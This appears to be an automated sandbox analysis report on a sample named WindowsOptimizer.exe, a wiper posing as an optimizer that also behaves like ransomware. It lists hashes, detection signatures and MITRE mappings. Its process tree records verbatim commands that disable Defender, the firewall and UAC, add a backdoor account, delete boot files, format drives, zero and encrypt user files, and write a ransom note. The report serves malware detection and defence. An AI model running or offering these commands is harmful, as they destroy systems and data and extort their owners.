Analysis
max time kernel: 2s
max time network: 3s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09-11-2024 21:27
Static task: static1
Behavioral task: behavioral1
  Sample: WindowsOptimizer.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: WindowsOptimizer.exe
  Resource: win10v2004-20241007-en
General
Target: WindowsOptimizer.exe
Size: 254KB
MD5: 5aaa262b518a3417e028e001152c9236
SHA1: 6d1cda51302d760509822b502a8f980537d17cb0
SHA256: d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b
SHA512: 722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca
SSDEEP: 3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1
Malware Config
Signatures
UAC bypass
  Processes:
    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe

Modifies boot configuration data using bcdedit (1 TTPs, 5 IoCs)
  Processes:
    pid | process
    2984 | bcdedit.exe
    3064 | bcdedit.exe
    3620 | bcdedit.exe
    4144 | bcdedit.exe
    4332 | bcdedit.exe

Disables RegEdit via registry modification (1 IoCs)
  Processes:
    description | ioc | process
    Set value (int) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | reg.exe

Disables Task Manager via registry modification

Modifies Windows Firewall (2 TTPs, 1 IoCs)
  Processes:
    pid | process
    1172 | netsh.exe

Enumerates connected drives (3 TTPs, 3 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
    description | ioc | process
    File opened (read-only) | \??\D: | format.com
    File opened (read-only) | \??\E: | format.com
    File opened (read-only) | \??\X: | mountvol.exe

Indicator Removal: File Deletion (1 TTPs)
  Adversaries may delete files left behind by the actions of their intrusion activity.

Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
  Bootkits write to the MBR to gain persistence at a level below the operating system.
  Processes:
    description | ioc | process
    File opened for modification | \??\PhysicalDrive0 | WindowsOptimizer.exe

Launches sc.exe (2 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  Processes:
    pid | process
    4452 | sc.exe
    216 | sc.exe

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
    Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe
    Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe

Modifies registry key (1 TTPs, 3 IoCs)

Runs net.exe

Suspicious use of FindShellTrayWindow (3 IoCs)
  Processes:
    pid | process
    4232 | efsui.exe
    4232 | efsui.exe
    4232 | efsui.exe

Suspicious use of SendNotifyMessage (3 IoCs)
  Processes:
    pid | process
    4232 | efsui.exe
    4232 | efsui.exe
    4232 | efsui.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
    description | pid | process | target process
    PID 1480 wrote to memory of 1204 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 1204 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1204 wrote to memory of 4288 | 1204 | cmd.exe | reg.exe
    PID 1204 wrote to memory of 4288 | 1204 | cmd.exe | reg.exe
    PID 1480 wrote to memory of 4844 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 4844 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 4844 wrote to memory of 1172 | 4844 | cmd.exe | netsh.exe
    PID 4844 wrote to memory of 1172 | 4844 | cmd.exe | netsh.exe
    PID 1480 wrote to memory of 1484 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 1484 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1484 wrote to memory of 3044 | 1484 | cmd.exe | reg.exe
    PID 1484 wrote to memory of 3044 | 1484 | cmd.exe | reg.exe
    PID 1480 wrote to memory of 3944 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 3944 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 3944 wrote to memory of 216 | 3944 | cmd.exe | sc.exe
    PID 3944 wrote to memory of 216 | 3944 | cmd.exe | sc.exe
    PID 1480 wrote to memory of 2708 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 2708 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 2708 wrote to memory of 4452 | 2708 | cmd.exe | sc.exe
    PID 2708 wrote to memory of 4452 | 2708 | cmd.exe | sc.exe
    PID 1480 wrote to memory of 3304 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 3304 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 3304 wrote to memory of 2416 | 3304 | cmd.exe | reg.exe
    PID 3304 wrote to memory of 2416 | 3304 | cmd.exe | reg.exe
    PID 1480 wrote to memory of 2036 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 2036 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 2036 wrote to memory of 4056 | 2036 | cmd.exe | reg.exe
    PID 2036 wrote to memory of 4056 | 2036 | cmd.exe | reg.exe
    PID 1480 wrote to memory of 1980 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 1980 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1980 wrote to memory of 4872 | 1980 | cmd.exe | reg.exe
    PID 1980 wrote to memory of 4872 | 1980 | cmd.exe | reg.exe
    PID 1480 wrote to memory of 2148 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 2148 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 2148 wrote to memory of 3528 | 2148 | cmd.exe | reg.exe
    PID 2148 wrote to memory of 3528 | 2148 | cmd.exe | reg.exe
    PID 1480 wrote to memory of 3588 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 3588 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 3588 wrote to memory of 2984 | 3588 | cmd.exe | bcdedit.exe
    PID 3588 wrote to memory of 2984 | 3588 | cmd.exe | bcdedit.exe
    PID 1480 wrote to memory of 856 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 856 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 856 wrote to memory of 3064 | 856 | cmd.exe | bcdedit.exe
    PID 856 wrote to memory of 3064 | 856 | cmd.exe | bcdedit.exe
    PID 1480 wrote to memory of 2516 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 2516 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 2464 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 2464 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 3628 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 3628 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 1760 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 1760 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 1844 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 1844 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 2464 wrote to memory of 1764 | 2464 | cmd.exe | net.exe
    PID 2464 wrote to memory of 1764 | 2464 | cmd.exe | net.exe
    PID 1764 wrote to memory of 3524 | 1764 | net.exe | net1.exe
    PID 1764 wrote to memory of 3524 | 1764 | net.exe | net1.exe
    PID 3628 wrote to memory of 4220 | 3628 | cmd.exe | cipher.exe
    PID 3628 wrote to memory of 4220 | 3628 | cmd.exe | cipher.exe
    PID 1480 wrote to memory of 4588 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1480 wrote to memory of 4588 | 1480 | WindowsOptimizer.exe | cmd.exe
    PID 1844 wrote to memory of 4996 | 1844 | cmd.exe | fsutil.exe
    PID 1844 wrote to memory of 4996 | 1844 | cmd.exe | fsutil.exe
Processes
depth | PID | image | command line
1 | 1480 | C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe | "C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of WriteProcessMemory
2 | 1204 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
3 | 4288 | C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2 | 4844 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
    - Suspicious use of WriteProcessMemory
3 | 1172 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
2 | 1484 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    - Suspicious use of WriteProcessMemory
3 | 3044 | C:\Windows\system32\reg.exe | reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    - UAC bypass
    - Modifies registry key
2 | 3944 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc stop wuauserv
    - Suspicious use of WriteProcessMemory
3 | 216 | C:\Windows\system32\sc.exe | sc stop wuauserv
    - Launches sc.exe
2 | 2708 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
    - Suspicious use of WriteProcessMemory
3 | 4452 | C:\Windows\system32\sc.exe | sc config wuauserv start=disabled
    - Launches sc.exe
2 | 3304 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
3 | 2416 | C:\Windows\system32\reg.exe | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    - Modifies registry key
2 | 2036 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
3 | 4056 | C:\Windows\system32\reg.exe | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Disables RegEdit via registry modification
    - Modifies registry key
2 | 1980 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
3 | 4872 | C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2 | 2148 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
    - Suspicious use of WriteProcessMemory
3 | 3528 | C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
2 | 3588 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    - Suspicious use of WriteProcessMemory
3 | 2984 | C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled No
    - Modifies boot configuration data using bcdedit
2 | 856 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    - Suspicious use of WriteProcessMemory
3 | 3064 | C:\Windows\system32\bcdedit.exe | bcdedit /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit
2 | 2516 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
2 | 2464 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
    - Suspicious use of WriteProcessMemory
3 | 1764 | C:\Windows\system32\net.exe | net user TrojanUser0 ComplexPass123! /add
    - Suspicious use of WriteProcessMemory
4 | 3524 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
2 | 1844 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
    - Suspicious use of WriteProcessMemory
3 | 4996 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"
3 | 2076 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"
3 | 4072 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"
3 | 512 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"
3 | 1588 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"
3 | 2136 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"
3 | 3268 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"
3 | 3264 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"
3 | 2592 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"
3 | 676 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"
3 | 3980 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"
3 | 3040 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
3 | 4316 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"
3 | 3060 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"
3 | 1968 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"
3 | 4348 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"
3 | 4420 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"
3 | 4064 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"
3 | 1220 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"
3 | 3164 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"
3 | 1280 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"
3 | 2832 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"
3 | 1900 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"
3 | 3436 | C:\Windows\system32\fsutil.exe | fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"
2 | 3628 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
    - Suspicious use of WriteProcessMemory
3 | 4220 | C:\Windows\system32\cipher.exe | cipher /E /A /S:C:\Users\Admin\Desktop
2 | 1760 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
2 | 4588 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
2 | 3400 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
3 | 3620 | C:\Windows\system32\bcdedit.exe | bcdedit /delete {bootmgr} /f
    - Modifies boot configuration data using bcdedit
2 | 2320 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
3 | 4144 | C:\Windows\system32\bcdedit.exe | bcdedit /delete {default} /f
    - Modifies boot configuration data using bcdedit
2 | 2564 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c mountvol X: /s
3 | 2468 | C:\Windows\system32\mountvol.exe | mountvol X: /s
2 | 2388 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
2 | 3352 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c mountvol X: /d
3 | 4972 | C:\Windows\system32\mountvol.exe | mountvol X: /d
    - Enumerates connected drives
2 | 3172 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
3 | 920 | C:\Windows\system32\format.com | format C: /fs:raw /q /y
2 | 4408 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
3 | 2336 | C:\Windows\system32\format.com | format D: /fs:raw /q /y
    - Enumerates connected drives
2 | 1316 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
3 | 4016 | C:\Windows\system32\format.com | format E: /fs:raw /q /y
    - Enumerates connected drives
2 | 792 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
3 | 4332 | C:\Windows\system32\bcdedit.exe | bcdedit /delete {current} /f
    - Modifies boot configuration data using bcdedit
2 | 216 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 388 | C:\Windows\system32\cmd.exe | cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 3944 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 2956 | C:\Windows\system32\cmd.exe | cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 4452 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 4268 | C:\Windows\system32\cmd.exe | cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 2708 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 2568 | C:\Windows\system32\cmd.exe | cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 3484 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 4924 | C:\Windows\system32\cmd.exe | cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
2 | 3304 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
2 | 4404 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
2 | 4744 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
2 | 4356 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
2 | 2004 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
2 | 2036 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
2 | 3504 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
2 | 3712 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
2 | 3564 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
2 | 884 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
2 | 1960 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
2 | 3032 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
2 | 1980 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
2 | 3720 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
2 | 3528 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
2 | 4944 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
2 | 2148 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
2 | 5052 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
2 | 1228 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
2 | 688 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
2 | 4212 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
2 | 1660 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
2 | 3064 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
2 | 3580 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
2 | 856 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
2 | 5056 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
2 | 1400 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
2 | 1464 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
2 | 2812 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
2 | 4764 | C:\Windows\system32\cmd.exe | cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
2 | 212 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\
2 | 2292 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:C:\
2 | 812 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\
2 | 4576 | C:\Windows\system32\cmd.exe | cmd.exe /c cipher /E /A /S:D:\
1 | 4232 | C:\Windows\system32\efsui.exe | efsui.exe /efs /keybackup
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Enterprise v15
Persistence
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Pre-OS Boot (1)
    Bootkit (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (3)
    Disable or Modify System Firewall (1)
    Disable or Modify Tools (1)
  Indicator Removal (1)
    File Deletion (1)
  Modify Registry (2)
  Pre-OS Boot (1)
    Bootkit (1)